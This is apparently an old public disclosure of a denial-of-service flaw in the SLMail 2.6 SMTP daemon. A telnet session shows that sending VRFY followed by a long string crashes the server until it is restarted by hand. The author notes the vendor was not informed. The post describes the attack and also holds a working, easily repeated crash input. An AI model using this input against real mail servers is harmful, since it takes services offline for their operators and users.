I have recently found a quite serious DoS attack for the SLMail
2.6 email daemon (www.seattlelabs.com/slmail). A long string of text
after a command makes the program crash. I have only tested this on
2.6, so I'm not sure if other versions are vulnerable.
craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
Connected to www.victim.com.
Escape character is '^]'.
220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here
vrfy
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
Connection closed by foreign host.
craphole:~$ telnet www.victim.com 25
Trying 555.55.555.55...
telnet: Unable to connect to remote host: Connection refused
craphole:~$
It will stay unresponsive until manually restarted. I haven't
mailed Seattle Labs about this, but I'm sure they'll figure it out.
Later,
Cisc0 @ Undernet
steven@efni.com